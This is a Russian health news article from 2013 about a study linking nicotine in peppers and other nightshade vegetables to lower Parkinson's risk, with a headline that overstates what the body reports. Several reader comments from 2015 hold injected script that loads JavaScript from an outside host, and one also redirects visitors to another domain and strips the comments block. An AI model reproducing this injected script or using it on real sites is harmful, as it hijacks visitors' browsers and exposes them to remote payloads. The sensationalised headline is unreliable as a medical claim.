Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Перец, как и сигареты, сп...  >>  Перец, как и сигареты, спасает от Паркинсона!
 
Обратная связь
 

Перец, как и сигареты, спасает от Паркинсона!

Размер шрифта
14 июня 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Курить – здоровью вредить. Все это знают, и мы ни в коем случае не собираемся опровергать этот постулат. Однако выяснилось, что никотин обладает некоторыми положительными эффектами и найти его можно не только в сигаретах.

Давно известно, что никотин снижает риск развития болезни Паркинсона. К счастью для некурящих людей, помимо табака, существуют и полезные источники никотина. А именно – некоторые овощи (например, перец и томаты).

Позитивное влияние этих овощей было продемонстрировано в одном из недавних исследований, результаты которого были опубликованы в авторитетном издании Annals of Neurology. В нем участвовали 500 человек с диагностированной болезнью Паркинсона и еще 650 человек без каких-либо неврологических расстройств. Всем им была рекомендована коррекция диеты.

Оказалось, что употребление овощей семейства Пасленовые (особенно, перца) снижало риск развития этого тяжелого заболевания. Ярче всего это проявлялось у некурящих участников исследования.

«В ходе нашей работы мы впервые попытались оценить влияние пищевого никотина на риск развития паркинсонизма», – утверждает доктор Сьюзан Нильсен, научный сотрудник Университета Вашингтона (Сиэттл). «В прошлом было показано, что курение снижает вероятность болезни Паркинсона, и нашей задачей было найти менее токсичный источник никотина, чтобы воспроизвести его положительные эффекты без вреда для здоровья».

Нильсен подчеркивает, что необходимы дальнейшие исследования в этой сфере.

Почему? Пока неясно

Хотя в этом исследовании и было продемонстрировано положительное влияние никотин-содержащих продуктов на риск развития болезни Паркинсона, причинно-следственные связи, лежащие в основе этого феномена, всё еще не вполне ясны.

Несмотря на это, многие неврологи оценивают результаты данного исследования как интригующие.

«Диета при неврологических заболеваниях – очень сложная и малопонятная область знаний», – говорит доктор Келли Чангизи, крупный специалист по болезни Паркинсона из Нью-Йорка. «Пациенты часто спрашивают, что им можно есть, что – нельзя, и во многих ситуациях мы просто не знаем, что ответить. Эта научная работа отчасти позволила развеять туман».

Эксперты также подчеркивают, что в производстве находятся и другие исследования, посвященные никотину и паркинсонизму. В частности, изучается влияние никотиновых пластырей.

Болезнь Паркинсона – это неврологическое заболевание, которое связано с гибелью нервных клеток, продуцирующих дофамин. Основные симптомы: тремор (дрожь), замедление движений и мышечная ригидность (напряжение). На сегодняшний день излечить болезнь невозможно, но можно эффективно контролировать симптомы. По статистике, более 10 миллионов человек в мире страдает от болезни Паркинсона.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:14

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:32

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:13

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Хотите бросить курить или заставить мужа бросить? Больше секса!   Ужас и обман! Никотиновые пластыри не помогут бросить курить!   У больных раком мозга появилась новая надежда!   Курение во время беременности сделает вашего ребенка шизофреником  
13 июня 2013Перец, как и сигареты, спасает от Паркинсона! 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Как бросить курить
Как сохранить мозги в 30 лет
Что происходит в теле курящего

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.